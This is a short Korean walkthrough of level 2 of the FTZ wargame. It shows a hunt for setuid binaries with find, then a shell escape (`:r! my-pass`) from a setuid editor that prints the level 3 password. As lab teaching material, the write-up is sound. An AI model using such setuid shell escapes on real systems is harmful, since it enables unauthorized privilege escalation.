[level2@ftz level2]$ cat hint
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...hint 파일을 출력해보니 텍스트 파일에서 쉘 명령어를 실행시키라고 하고 있습니다.
⇾ level3의 setuid가 걸린 텍스트 파일을 찾아 실행시키고 :r! command 명령어를 사용하면 my-pass 명령어를 실행시킬 수 있을 거 같습니다.
[level2@ftz level2]$ find / -user level3 -perm -4000 2> /dev/null
/usr/bin/editor
[level2@ftz level2]$ cd /usr/bin
[level2@ftz bin]$ ls -l | grep edit
-rwxr-xr-x 1 root root 1749 Jan 25 2003 editdiff
-rwsr-x--- 1 level3 level2 11651 Sep 10 2011 editorfind 명령어를 통해 level3의 setuid가 걸린 파일을 검색했고 editor라는 파일을 찾았습니다.
그래서 editor의 파일 위치로 이동하고 권한을 출력해서 보니 setuid가 걸려있는 것을 확인할 수 있습니다.
[level2@ftz bin]$ editor
^[[H^[[2J
Level3 Password is "can you fly?".editor를 실행시키고 :r! my-pass 명령어를 사용하니 Level 3의 패스워드가 출력되었습니다.
